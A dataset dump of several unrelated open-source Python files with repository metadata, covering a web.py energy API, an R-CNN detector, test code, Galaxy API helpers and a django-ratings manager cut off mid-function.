o.type = d['type']
return o
| true
| true
|
f705ca0b99c4431c3fdc996319aa370d49c274ac
| 1,827
|
py
|
Python
|
newDataAnalytics.py
|
PeterJWei/EnergyFootprinting
|
0396efba7d4e6863452e322f9f7561c6cd756478
|
[
"MIT"
] | null | null | null |
newDataAnalytics.py
|
PeterJWei/EnergyFootprinting
|
0396efba7d4e6863452e322f9f7561c6cd756478
|
[
"MIT"
] | null | null | null |
newDataAnalytics.py
|
PeterJWei/EnergyFootprinting
|
0396efba7d4e6863452e322f9f7561c6cd756478
|
[
"MIT"
] | null | null | null |
import json
import web
import calendar
import datetime
import cloudserver
urls = (
"/BuildingFootprint/", "BuildingFootprint",
"/BuildingFootprintDisaggregated/", "BuildingFootprintDisaggregated",
"/PersonalConsumption/", "PersonalConsumption",
"/HistoricalConsumption/", "HistoricalConsumption")
class BuildingFootprint:
def GET(self):
raw_time = web.input()
if "end" not in raw_time:
end = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
else:
end = float(raw_time['end'])
if "start" not in raw_time:
start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 #1 day
else:
start = float(raw_time['start'])
return cloudserver.db.buildingFootprint(start, end)
class BuildingFootprintDisaggregated:
def GET(self):
raw_time = web.input()
if "end" not in raw_time:
end = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
else:
end = float(raw_time['end'])
if "start" not in raw_time:
start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 #1 day
else:
start = float(raw_time['start'])
return cloudserver.db.buildingFootprintDisaggregated(start, end)
class PersonalConsumption:
def GET(self):
print("Got to Personal Consumption")
raw_data = web.input()
end = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
if "end" in raw_data:
end = float(raw_data['end'])
start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60 #1 day
if "start" in raw_data:
start = float(raw_data['start'])
user = "Peter Wei"
if "user" in raw_data:
user = raw_data['user']
return cloudserver.db.personalFootprint(user, start, end)
class HistoricalConsumption:
def GET(self):
return cloudserver.db.historicalConsumption()
dataExtraction = web.application(urls, locals())
| 26.478261
| 85
| 0.727422
|
import json
import web
import calendar
import datetime
import cloudserver
urls = (
"/BuildingFootprint/", "BuildingFootprint",
"/BuildingFootprintDisaggregated/", "BuildingFootprintDisaggregated",
"/PersonalConsumption/", "PersonalConsumption",
"/HistoricalConsumption/", "HistoricalConsumption")
class BuildingFootprint:
def GET(self):
raw_time = web.input()
if "end" not in raw_time:
end = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
else:
end = float(raw_time['end'])
if "start" not in raw_time:
start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60
else:
start = float(raw_time['start'])
return cloudserver.db.buildingFootprint(start, end)
class BuildingFootprintDisaggregated:
def GET(self):
raw_time = web.input()
if "end" not in raw_time:
end = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
else:
end = float(raw_time['end'])
if "start" not in raw_time:
start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60
else:
start = float(raw_time['start'])
return cloudserver.db.buildingFootprintDisaggregated(start, end)
class PersonalConsumption:
def GET(self):
print("Got to Personal Consumption")
raw_data = web.input()
end = calendar.timegm(datetime.datetime.utcnow().utctimetuple())
if "end" in raw_data:
end = float(raw_data['end'])
start = calendar.timegm(datetime.datetime.utcnow().utctimetuple())-24*60*60
if "start" in raw_data:
start = float(raw_data['start'])
user = "Peter Wei"
if "user" in raw_data:
user = raw_data['user']
return cloudserver.db.personalFootprint(user, start, end)
class HistoricalConsumption:
def GET(self):
return cloudserver.db.historicalConsumption()
dataExtraction = web.application(urls, locals())
| true
| true
|
f705ca2749b113501167b31f27c6bb73734fd6c0
| 2,235
|
py
|
Python
|
openpose/model/detector/generalized_rcnn.py
|
leehsiu/pyopenpose
|
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
|
[
"MIT"
] | null | null | null |
openpose/model/detector/generalized_rcnn.py
|
leehsiu/pyopenpose
|
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
|
[
"MIT"
] | null | null | null |
openpose/model/detector/generalized_rcnn.py
|
leehsiu/pyopenpose
|
c4feef04a9e563fb91e18f745bc187c6f2aeb72c
|
[
"MIT"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
"""
Implements the Generalized R-CNN framework
"""
import torch
from torch import nn
from openpose.structures.image_list import to_image_list
from ..backbone import build_backbone
from ..rpn.rpn import build_rpn
from ..roi_heads.roi_heads import build_roi_heads
class GeneralizedRCNN(nn.Module):
"""
Main class for Generalized R-CNN. Currently supports boxes and masks.
It consists of three main parts:
- backbone
- rpn
- heads: takes the features + the proposals from the RPN and computes
detections / masks from it.
"""
def __init__(self, cfg):
super(GeneralizedRCNN, self).__init__()
self.backbone = build_backbone(cfg)
self.rpn = build_rpn(cfg, self.backbone.out_channels)
self.roi_heads = build_roi_heads(cfg, self.backbone.out_channels)
def forward(self, images, targets=None):
"""
Arguments:
images (list[Tensor] or ImageList): images to be processed
targets (list[BoxList]): ground-truth boxes present in the image (optional)
Returns:
result (list[BoxList] or dict[Tensor]): the output from the model.
During training, it returns a dict[Tensor] which contains the losses.
During testing, it returns list[BoxList] contains additional fields
like `scores`, `labels` and `mask` (for Mask R-CNN models).
"""
if self.training and targets is None:
raise ValueError("In training mode, targets should be passed")
images = to_image_list(images)
features = self.backbone(images.tensors)
proposals, proposal_losses = self.rpn(images, features, targets)
if self.roi_heads:
x, result, detector_losses = self.roi_heads(features, proposals, targets)
else:
# RPN-only models don't have roi_heads
x = features
result = proposals
detector_losses = {}
if self.training:
losses = {}
losses.update(detector_losses)
losses.update(proposal_losses)
return losses,result
return result
| 34.384615
| 87
| 0.644295
|
import torch
from torch import nn
from openpose.structures.image_list import to_image_list
from ..backbone import build_backbone
from ..rpn.rpn import build_rpn
from ..roi_heads.roi_heads import build_roi_heads
class GeneralizedRCNN(nn.Module):
def __init__(self, cfg):
super(GeneralizedRCNN, self).__init__()
self.backbone = build_backbone(cfg)
self.rpn = build_rpn(cfg, self.backbone.out_channels)
self.roi_heads = build_roi_heads(cfg, self.backbone.out_channels)
def forward(self, images, targets=None):
if self.training and targets is None:
raise ValueError("In training mode, targets should be passed")
images = to_image_list(images)
features = self.backbone(images.tensors)
proposals, proposal_losses = self.rpn(images, features, targets)
if self.roi_heads:
x, result, detector_losses = self.roi_heads(features, proposals, targets)
else:
x = features
result = proposals
detector_losses = {}
if self.training:
losses = {}
losses.update(detector_losses)
losses.update(proposal_losses)
return losses,result
return result
| true
| true
|
f705cb12d2f7098d80c81f26b124cf8f7a03cf9a
| 1,441
|
py
|
Python
|
deltalanguage/test/runtime/test_runtime.py
|
riverlane/deltalanguage
|
41c3cfa88ed3f17956645c18566c2147a4bdd74c
|
[
"MIT"
] | 16
|
2021-01-06T17:44:51.000Z
|
2022-01-06T12:07:07.000Z
|
deltalanguage/test/runtime/test_runtime.py
|
riverlane/deltalanguage
|
41c3cfa88ed3f17956645c18566c2147a4bdd74c
|
[
"MIT"
] | null | null | null |
deltalanguage/test/runtime/test_runtime.py
|
riverlane/deltalanguage
|
41c3cfa88ed3f17956645c18566c2147a4bdd74c
|
[
"MIT"
] | 4
|
2021-03-25T20:35:08.000Z
|
2021-09-06T13:10:58.000Z
|
"""Test DeltaPySimulator functionality pre-execution."""
import unittest
import deltalanguage as dl
from deltalanguage.test._graph_lib import (getg_const_chain,
getg_optional_queues)
class DeltaQueueCreationTest(unittest.TestCase):
"""Test that the simulator creates queues properly."""
def test_queue_types(self):
"""Test that queues of correct types are created (or not) depending on
the type of the source and destination nodes.
"""
graph = getg_const_chain()
dl.DeltaPySimulator(graph)
self.assertEqual(len(graph.nodes[0].out_queues), 0)
self.assertEqual(len(graph.nodes[1].out_queues), 1)
self.assertEqual(len(graph.nodes[2].out_queues), 1)
self.assertEqual(type(graph.nodes[1].out_queues['output']),
dl.runtime.ConstQueue)
self.assertEqual(type(graph.nodes[2].out_queues['output']),
dl.runtime.DeltaQueue)
def test_queue_optionality(self):
"""Test that queues inhere correct optionality depending on the type of
the destination node.
"""
graph = getg_optional_queues()
dl.DeltaPySimulator(graph)
self.assertEqual(graph.nodes[0].out_queues['output'].optional, True)
self.assertEqual(graph.nodes[1].out_queues['output'].optional, False)
if __name__ == "__main__":
unittest.main()
| 33.511628
| 79
| 0.651631
|
import unittest
import deltalanguage as dl
from deltalanguage.test._graph_lib import (getg_const_chain,
getg_optional_queues)
class DeltaQueueCreationTest(unittest.TestCase):
def test_queue_types(self):
graph = getg_const_chain()
dl.DeltaPySimulator(graph)
self.assertEqual(len(graph.nodes[0].out_queues), 0)
self.assertEqual(len(graph.nodes[1].out_queues), 1)
self.assertEqual(len(graph.nodes[2].out_queues), 1)
self.assertEqual(type(graph.nodes[1].out_queues['output']),
dl.runtime.ConstQueue)
self.assertEqual(type(graph.nodes[2].out_queues['output']),
dl.runtime.DeltaQueue)
def test_queue_optionality(self):
graph = getg_optional_queues()
dl.DeltaPySimulator(graph)
self.assertEqual(graph.nodes[0].out_queues['output'].optional, True)
self.assertEqual(graph.nodes[1].out_queues['output'].optional, False)
if __name__ == "__main__":
unittest.main()
| true
| true
|
f705ceaa19f72aa3d963f72c85586a1a32e6de9b
| 101
|
py
|
Python
|
main.py
|
onkarsherkar/flask-web-app-tutorail
|
add0fa67c4c02d93b95c90c61671f02ea1b3d029
|
[
"MIT"
] | null | null | null |
main.py
|
onkarsherkar/flask-web-app-tutorail
|
add0fa67c4c02d93b95c90c61671f02ea1b3d029
|
[
"MIT"
] | null | null | null |
main.py
|
onkarsherkar/flask-web-app-tutorail
|
add0fa67c4c02d93b95c90c61671f02ea1b3d029
|
[
"MIT"
] | null | null | null |
from website import create_app
app = create_app()
if __name__== '__main__':
app.run(debug=True)
| 14.428571
| 30
| 0.722772
|
from website import create_app
app = create_app()
if __name__== '__main__':
app.run(debug=True)
| true
| true
|
f705cf0495bceae4e5ea4f4df95a6ec02a280af1
| 3,195
|
py
|
Python
|
tools/src/service/entry_pusher.py
|
Symthy/blog-index-manager
|
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
|
[
"MIT"
] | null | null | null |
tools/src/service/entry_pusher.py
|
Symthy/blog-index-manager
|
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
|
[
"MIT"
] | 1
|
2022-01-29T08:28:36.000Z
|
2022-01-29T08:28:36.000Z
|
tools/src/service/entry_pusher.py
|
Symthy/blog-index-manager
|
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
|
[
"MIT"
] | null | null | null |
from typing import List
from blogs.api.interface import IBlogApiExecutor
from domain.blog.blog_entry import BlogEntry, BlogEntries
from domain.doc.doc_entry import DocEntries, DocEntry
from dump.blog_to_doc_mapping import BlogDocEntryMapping
from dump.interface import IDumpEntriesAccessor
from files.conf.category_group_def import CategoryGroupDef
from service.external.blog_entry_index_updater import update_blog_entry_summary_file
from service.external.blog_entry_pusher import push_blog_and_photo_entry
from service.local.doc_entry_pusher import push_documents_to_docs
def push_entry_to_docs_and_blog(api_executor: IBlogApiExecutor,
dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry],
category_group_def: CategoryGroupDef, is_draft: bool,
target_dir_names: List[str] = None):
doc_entries = push_documents_to_docs(dump_doc_data_accessor, category_group_def, target_dir_names)
if doc_entries is None:
return
__push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft)
def push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor,
dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry],
category_group_def: CategoryGroupDef,
target_doc_entry_ids: List[str], is_draft: bool):
doc_entries: DocEntries = dump_doc_data_accessor.load_entries(target_doc_entry_ids)
__push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft)
def __push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor,
dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
category_group_def: CategoryGroupDef, doc_entries: DocEntries, is_draft: bool):
blog_doc_mapping = BlogDocEntryMapping()
updated_blog_entry_list: List[BlogEntry] = []
for doc_entry in doc_entries.entry_list:
blog_entry_id_opt = blog_doc_mapping.get_blog_entry_id(doc_entry.id)
old_blog_entry_opt = None if blog_entry_id_opt is None else dump_blog_data_accessor.load_entry(
blog_entry_id_opt)
new_blog_entry_opt = push_blog_and_photo_entry(api_executor, doc_entry, is_draft, old_blog_entry_opt)
if new_blog_entry_opt is None:
print(f'[Info] blog push skip. (dir: {doc_entry.dir_path})')
continue
updated_blog_entry_list.append(new_blog_entry_opt)
blog_doc_mapping.push_entry_pair(new_blog_entry_opt.id, doc_entry.id)
# dump to file
updated_blog_entries = BlogEntries(updated_blog_entry_list)
dump_blog_data_accessor.save_entries(updated_blog_entries)
blog_doc_mapping.dump_file()
update_blog_entry_summary_file(dump_blog_data_accessor, category_group_def, updated_blog_entries)
| 59.166667
| 116
| 0.746166
|
from typing import List
from blogs.api.interface import IBlogApiExecutor
from domain.blog.blog_entry import BlogEntry, BlogEntries
from domain.doc.doc_entry import DocEntries, DocEntry
from dump.blog_to_doc_mapping import BlogDocEntryMapping
from dump.interface import IDumpEntriesAccessor
from files.conf.category_group_def import CategoryGroupDef
from service.external.blog_entry_index_updater import update_blog_entry_summary_file
from service.external.blog_entry_pusher import push_blog_and_photo_entry
from service.local.doc_entry_pusher import push_documents_to_docs
def push_entry_to_docs_and_blog(api_executor: IBlogApiExecutor,
dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry],
category_group_def: CategoryGroupDef, is_draft: bool,
target_dir_names: List[str] = None):
doc_entries = push_documents_to_docs(dump_doc_data_accessor, category_group_def, target_dir_names)
if doc_entries is None:
return
__push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft)
def push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor,
dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry],
category_group_def: CategoryGroupDef,
target_doc_entry_ids: List[str], is_draft: bool):
doc_entries: DocEntries = dump_doc_data_accessor.load_entries(target_doc_entry_ids)
__push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft)
def __push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor,
dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry],
category_group_def: CategoryGroupDef, doc_entries: DocEntries, is_draft: bool):
blog_doc_mapping = BlogDocEntryMapping()
updated_blog_entry_list: List[BlogEntry] = []
for doc_entry in doc_entries.entry_list:
blog_entry_id_opt = blog_doc_mapping.get_blog_entry_id(doc_entry.id)
old_blog_entry_opt = None if blog_entry_id_opt is None else dump_blog_data_accessor.load_entry(
blog_entry_id_opt)
new_blog_entry_opt = push_blog_and_photo_entry(api_executor, doc_entry, is_draft, old_blog_entry_opt)
if new_blog_entry_opt is None:
print(f'[Info] blog push skip. (dir: {doc_entry.dir_path})')
continue
updated_blog_entry_list.append(new_blog_entry_opt)
blog_doc_mapping.push_entry_pair(new_blog_entry_opt.id, doc_entry.id)
updated_blog_entries = BlogEntries(updated_blog_entry_list)
dump_blog_data_accessor.save_entries(updated_blog_entries)
blog_doc_mapping.dump_file()
update_blog_entry_summary_file(dump_blog_data_accessor, category_group_def, updated_blog_entries)
| true
| true
|
f705d15166e8684268640b17b721182297f2ea28
| 330
|
py
|
Python
|
bluebottle/cms/migrations/0015_merge_20161219_0946.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 10
|
2015-05-28T18:26:40.000Z
|
2021-09-06T10:07:03.000Z
|
bluebottle/cms/migrations/0015_merge_20161219_0946.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 762
|
2015-01-15T10:00:59.000Z
|
2022-03-31T15:35:14.000Z
|
bluebottle/cms/migrations/0015_merge_20161219_0946.py
|
terrameijar/bluebottle
|
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
|
[
"BSD-3-Clause"
] | 9
|
2015-02-20T13:19:30.000Z
|
2022-03-08T14:09:17.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-19 08:46
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cms', '0014_auto_20161216_1359'),
('cms', '0014_auto_20161216_1424'),
]
operations = [
]
| 19.411765
| 48
| 0.654545
|
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('cms', '0014_auto_20161216_1359'),
('cms', '0014_auto_20161216_1424'),
]
operations = [
]
| true
| true
|
f705d1668beb8e7029c97be27c6db88af67d97b3
| 4,213
|
py
|
Python
|
planemo/galaxy/api.py
|
pvanheus/planemo
|
12c4256325bb1b274dcd40d64b91c1f832cf49b1
|
[
"CC-BY-3.0"
] | null | null | null |
planemo/galaxy/api.py
|
pvanheus/planemo
|
12c4256325bb1b274dcd40d64b91c1f832cf49b1
|
[
"CC-BY-3.0"
] | 1
|
2016-09-14T18:09:59.000Z
|
2016-09-14T18:09:59.000Z
|
planemo/galaxy/api.py
|
jmchilton/planemo
|
d352a085fe10cb6b7c1384663b114201da42d97b
|
[
"CC-BY-3.0"
] | null | null | null |
"""A high-level interface to local Galaxy instances using bioblend."""
from six import StringIO
from planemo.bioblend import ensure_module
from planemo.bioblend import galaxy
DEFAULT_MASTER_API_KEY = "test_key"
def gi(port=None, url=None, key=None):
"""Return a bioblend ``GalaxyInstance`` for Galaxy on this port."""
ensure_module()
if key is None:
key = DEFAULT_MASTER_API_KEY
if port is None:
url = url
else:
url = "http://localhost:%d" % int(port)
return galaxy.GalaxyInstance(
url=url,
key=key
)
def user_api_key(admin_gi):
"""Use an admin authenticated account to generate a user API key."""
ensure_module()
# TODO: thread-safe
users = admin_gi.users
all_users = users.get_users()
user_id = None
for user in all_users:
if user["email"] == "planemo@galaxyproject.org":
user_id = user["id"]
if user_id is None:
# TODO: Allow override with --user_api_key.
galaxy_config = admin_gi.config.get_config()
use_remote_user = bool(galaxy_config["use_remote_user"])
if not use_remote_user:
user_response = users.create_local_user(
"planemo",
"planemo@galaxyproject.org",
"planemo",
)
user_id = user_response["id"]
else:
user_response = users.create_remote_user(
"planemo@galaxyproject.org",
)
user_id = user_response["id"]
return users.create_user_apikey(user_id)
def summarize_history(ctx, gi, history_id):
"""Summarize a history with print() based on similar code in Galaxy for populators.
"""
if not ctx.verbose:
return
if history_id is None:
raise ValueError("summarize_history passed empty history_id")
try:
history_contents = gi.histories.show_history(history_id, contents=True)
except Exception:
print("Failed to fetch history contents in summarize_history.")
return
for history_content in history_contents:
history_content_id = history_content.get('id', None)
print("| %d - %s (HID - NAME) " % (int(history_content['hid']), history_content['name']))
if history_content['history_content_type'] == 'dataset_collection':
history_contents_json = gi.histories.show_dataset_collection(history_id, history_content["id"])
print("| Dataset Collection: %s" % history_contents_json)
continue
try:
dataset_info = gi.histories.show_dataset(history_id, history_content_id)
print("| Dataset State:")
print(_format_for_summary(dataset_info.get("state"), "Dataset state is unknown."))
print("| Dataset Blurb:")
print(_format_for_summary(dataset_info.get("misc_blurb", ""), "Dataset blurb was empty."))
print("| Dataset Info:")
print(_format_for_summary(dataset_info.get("misc_info", ""), "Dataset info is empty."))
print("| Peek:")
print(_format_for_summary(dataset_info.get("peek", ""), "Peek unavilable."))
except Exception:
print("| *PLANEMO ERROR FETCHING DATASET DETAILS*")
try:
provenance_info = _dataset_provenance(gi, history_id, history_content_id)
print("| Dataset Job Standard Output:")
print(_format_for_summary(provenance_info.get("stdout", ""), "Standard output was empty."))
print("| Dataset Job Standard Error:")
print(_format_for_summary(provenance_info.get("stderr", ""), "Standard error was empty."))
except Exception:
print("| *PLANEMO ERROR FETCHING JOB DETAILS*")
print("|")
def _format_for_summary(blob, empty_message, prefix="| "):
contents = "\n".join(["%s%s" % (prefix, line.strip()) for line in StringIO(blob).readlines() if line.rstrip("\n\r")])
return contents or "%s*%s*" % (prefix, empty_message)
def _dataset_provenance(gi, history_id, id):
provenance = gi.histories.show_dataset_provenance(history_id, id)
return provenance
__all__ = (
"DEFAULT_MASTER_API_KEY",
"gi",
"user_api_key",
)
| 36.318966
| 121
| 0.635652
|
from six import StringIO
from planemo.bioblend import ensure_module
from planemo.bioblend import galaxy
DEFAULT_MASTER_API_KEY = "test_key"
def gi(port=None, url=None, key=None):
ensure_module()
if key is None:
key = DEFAULT_MASTER_API_KEY
if port is None:
url = url
else:
url = "http://localhost:%d" % int(port)
return galaxy.GalaxyInstance(
url=url,
key=key
)
def user_api_key(admin_gi):
ensure_module()
users = admin_gi.users
all_users = users.get_users()
user_id = None
for user in all_users:
if user["email"] == "planemo@galaxyproject.org":
user_id = user["id"]
if user_id is None:
galaxy_config = admin_gi.config.get_config()
use_remote_user = bool(galaxy_config["use_remote_user"])
if not use_remote_user:
user_response = users.create_local_user(
"planemo",
"planemo@galaxyproject.org",
"planemo",
)
user_id = user_response["id"]
else:
user_response = users.create_remote_user(
"planemo@galaxyproject.org",
)
user_id = user_response["id"]
return users.create_user_apikey(user_id)
def summarize_history(ctx, gi, history_id):
if not ctx.verbose:
return
if history_id is None:
raise ValueError("summarize_history passed empty history_id")
try:
history_contents = gi.histories.show_history(history_id, contents=True)
except Exception:
print("Failed to fetch history contents in summarize_history.")
return
for history_content in history_contents:
history_content_id = history_content.get('id', None)
print("| %d - %s (HID - NAME) " % (int(history_content['hid']), history_content['name']))
if history_content['history_content_type'] == 'dataset_collection':
history_contents_json = gi.histories.show_dataset_collection(history_id, history_content["id"])
print("| Dataset Collection: %s" % history_contents_json)
continue
try:
dataset_info = gi.histories.show_dataset(history_id, history_content_id)
print("| Dataset State:")
print(_format_for_summary(dataset_info.get("state"), "Dataset state is unknown."))
print("| Dataset Blurb:")
print(_format_for_summary(dataset_info.get("misc_blurb", ""), "Dataset blurb was empty."))
print("| Dataset Info:")
print(_format_for_summary(dataset_info.get("misc_info", ""), "Dataset info is empty."))
print("| Peek:")
print(_format_for_summary(dataset_info.get("peek", ""), "Peek unavilable."))
except Exception:
print("| *PLANEMO ERROR FETCHING DATASET DETAILS*")
try:
provenance_info = _dataset_provenance(gi, history_id, history_content_id)
print("| Dataset Job Standard Output:")
print(_format_for_summary(provenance_info.get("stdout", ""), "Standard output was empty."))
print("| Dataset Job Standard Error:")
print(_format_for_summary(provenance_info.get("stderr", ""), "Standard error was empty."))
except Exception:
print("| *PLANEMO ERROR FETCHING JOB DETAILS*")
print("|")
def _format_for_summary(blob, empty_message, prefix="| "):
contents = "\n".join(["%s%s" % (prefix, line.strip()) for line in StringIO(blob).readlines() if line.rstrip("\n\r")])
return contents or "%s*%s*" % (prefix, empty_message)
def _dataset_provenance(gi, history_id, id):
provenance = gi.histories.show_dataset_provenance(history_id, id)
return provenance
__all__ = (
"DEFAULT_MASTER_API_KEY",
"gi",
"user_api_key",
)
| true
| true
|
f705d2280b305e92ead506194e8bf7b9a79b98f6
| 2,143
|
py
|
Python
|
setup.py
|
chowmean/DBSheet
|
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
|
[
"Apache-2.0"
] | 3
|
2017-08-18T20:04:12.000Z
|
2021-01-08T12:23:43.000Z
|
setup.py
|
chowmean/DBSheet
|
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:13:57.000Z
|
2021-06-01T23:13:57.000Z
|
setup.py
|
chowmean/DBSheet
|
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Python installation script
# Author - @chowmean
from __future__ import print_function
import os.path
import sys
import setuptools
# Project variables
VER_PROP_FILE = os.path.join(os.path.dirname(__file__), 'version.properties')
REQUIREMENTS_FILE = os.path.join(os.path.dirname(__file__), 'requirements.txt')
CLASSIFIERS = [
"Programming Language :: Python",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Development Status :: 4 - Beta",
"Environment :: Plugins",
"Topic :: Software Development :: Libraries :: Python Modules",
"License :: Other/Proprietary License",
"Natural Language :: English",
]
# Read version properties file and extract version number.
def get_version():
version = "0.1.4"
try:
with open(VER_PROP_FILE) as f:
for line in f.readlines():
if line.startswith("version="):
version = line.lstrip('version=').strip()
break
except IOError as ioe:
print(ioe, file=sys.stderr)
return version
# Read requirements.txt file and extract the list of dependency.
def get_install_requirements():
# read requirements
requires = []
try:
with open(REQUIREMENTS_FILE) as f:
requires = list(map(lambda l: l.strip(), f.readlines()))
except IOError as ioe:
print(ioe, file=sys.stderr)
sys.exit(1)
return requires
if __name__ == '__main__':
with open('README.md', 'r') as f:
readme = f.read()
setuptools.setup(
name="db_sheet",
version=get_version(),
description="db_sheet: Using Google Spreadsheets as Database.",
author="chowmean",
author_email="gaurav.dev.iiitm@gmail.com",
url="https://github.com/chowmean/DBSheet",
keywords=["DBSheet, db_sheet, google spreadsheets. excel"],
install_requires=get_install_requirements(),
packages=["db_sheet", ],
classifiers=CLASSIFIERS,
long_description=readme,
long_description_content_type="text/markdown",
license="Apache-2.0"
)
| 29.763889
| 79
| 0.643957
|
from __future__ import print_function
import os.path
import sys
import setuptools
VER_PROP_FILE = os.path.join(os.path.dirname(__file__), 'version.properties')
REQUIREMENTS_FILE = os.path.join(os.path.dirname(__file__), 'requirements.txt')
CLASSIFIERS = [
"Programming Language :: Python",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Development Status :: 4 - Beta",
"Environment :: Plugins",
"Topic :: Software Development :: Libraries :: Python Modules",
"License :: Other/Proprietary License",
"Natural Language :: English",
]
def get_version():
version = "0.1.4"
try:
with open(VER_PROP_FILE) as f:
for line in f.readlines():
if line.startswith("version="):
version = line.lstrip('version=').strip()
break
except IOError as ioe:
print(ioe, file=sys.stderr)
return version
def get_install_requirements():
requires = []
try:
with open(REQUIREMENTS_FILE) as f:
requires = list(map(lambda l: l.strip(), f.readlines()))
except IOError as ioe:
print(ioe, file=sys.stderr)
sys.exit(1)
return requires
if __name__ == '__main__':
with open('README.md', 'r') as f:
readme = f.read()
setuptools.setup(
name="db_sheet",
version=get_version(),
description="db_sheet: Using Google Spreadsheets as Database.",
author="chowmean",
author_email="gaurav.dev.iiitm@gmail.com",
url="https://github.com/chowmean/DBSheet",
keywords=["DBSheet, db_sheet, google spreadsheets. excel"],
install_requires=get_install_requirements(),
packages=["db_sheet", ],
classifiers=CLASSIFIERS,
long_description=readme,
long_description_content_type="text/markdown",
license="Apache-2.0"
)
| true
| true
|
f705d35f606de1dd5f2d3137aa565c331846f652
| 5,403
|
py
|
Python
|
djangoratings/managers.py
|
adw0rd/django-ratings
|
941048e05a14bb997966fe1d4e8fd638ee66d76f
|
[
"BSD-2-Clause"
] | 1
|
2021-04-29T11:19:47.000Z
|
2021-04-29T11:19:47.000Z
|
djangoratings/managers.py
|
adw0rd/django-ratings
|
941048e05a14bb997966fe1d4e8fd638ee66d76f
|
[
"BSD-2-Clause"
] | null | null | null |
djangoratings/managers.py
|
adw0rd/django-ratings
|
941048e05a14bb997966fe1d4e8fd638ee66d76f
|
[
"BSD-2-Clause"
] | null | null | null |
from django.db.models import Manager
from django.db.models.query import QuerySet
from django.contrib.contenttypes.models import ContentType
import itertools
class VoteQuerySet(QuerySet):
def delete(self, *args, **kwargs):
"""Handles updating the related `votes` and `score` fields attached to the model."""
# XXX: circular import
from fields import RatingField
qs = self.distinct().values_list('content_type', 'object_id').order_by('content_type')
to_update = []
for content_type, objects in itertools.groupby(qs, key=lambda x: x[0]):
model_class = ContentType.objects.get(pk=content_type).model_class()
if model_class:
to_update.extend(list(model_class.objects.filter(pk__in=list(objects)[0])))
retval = super(VoteQuerySet, self).delete(*args, **kwargs)
# TODO: this could be improved
for obj in to_update:
for field in getattr(obj, '_djangoratings', []):
getattr(obj, field.name)._update(commit=False)
obj.save()
return retval
class VoteManager(Manager):
def get_query_set(self):
return VoteQuerySet(self.model)
def get_for_user_in_bulk(self, objects, user):
objects = list(objects)
if len(objects) > 0:
ctype = ContentType.objects.get_for_model(objects[0])
votes = list(self.filter(content_type__pk=ctype.id,
object_id__in=[obj._get_pk_val() \
for obj in objects],
user__pk=user.id))
vote_dict = dict([(vote.object_id, vote) for vote in votes])
else:
vote_dict = {}
return vote_dict
class SimilarUserManager(Manager):
def get_recommendations(self, user, model_class, min_score=1):
from djangoratings.models import Vote, IgnoredObject
content_type = ContentType.objects.get_for_model(model_class)
params = dict(
v=Vote._meta.db_table,
sm=self.model._meta.db_table,
m=model_class._meta.db_table,
io=IgnoredObject._meta.db_table,
)
objects = model_class._default_manager.extra(
tables=[params['v']],
where=[
'%(v)s.object_id = %(m)s.id and %(v)s.content_type_id = %%s' % params,
'%(v)s.user_id IN (select to_user_id from %(sm)s where from_user_id = %%s and exclude = 0)' % params,
'%(v)s.score >= %%s' % params,
# Exclude already rated maps
'%(v)s.object_id NOT IN (select object_id from %(v)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params,
# IgnoredObject exclusions
'%(v)s.object_id NOT IN (select object_id from %(io)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params,
],
